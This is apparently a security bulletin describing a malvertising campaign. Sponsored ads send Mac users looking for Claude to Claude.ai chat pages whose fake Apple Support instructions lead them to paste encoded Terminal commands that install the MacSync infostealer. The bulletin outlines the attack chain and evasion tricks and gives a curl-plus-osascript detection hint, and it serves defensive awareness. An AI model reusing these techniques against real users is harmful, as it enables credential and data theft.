256/69 Tuesday, May 12, 2026
Reports have emerged of a malicious advertising campaign targeting macOS users searching for the Anthropic Claude application to install on their computers. Attackers reportedly purchased advertising space through Google Ads and linked victims to shared chat pages hosted on the official Claude.ai domain, making the pages appear legitimate and trustworthy. The incident is particularly significant because it abuses the credibility of a legitimate AI platform to bypass suspicion and manipulate users into executing malicious commands that ultimately install information-stealing malware.
The attack chain begins when users search for terms related to downloading Claude for Mac and click on sponsored advertisements appearing in search results. Victims are then redirected to a Claude.ai chat page containing fraudulent content disguised as installation instructions from Apple Support. The chat instructs users to copy and execute commands within the macOS Terminal application. These commands are encoded to conceal the true destination and functionality. Once executed, the commands download and run scripts directly in memory through the macOS osascript process, leaving minimal traces on disk. Analysis revealed that the malware checks the victim’s keyboard language settings and immediately terminates if it detects Russian or CIS-region configurations. Otherwise, the MacSync malware proceeds to harvest sensitive information including browser passwords, cookies, and macOS Keychain data before transmitting the information back to attacker-controlled servers.
To reduce the risk of this type of threat, users are strongly advised to avoid clicking sponsored links in search engine results and instead manually type the official Anthropic website address when downloading software. Users should never copy and execute Terminal commands unless they fully understand their function, regardless of whether the instructions appear on trusted platforms. For enterprise administrators, monitoring suspicious behavior such as the execution of curl commands combined with direct operating system scripting activity may help detect and mitigate similar attacks before significant damage occurs.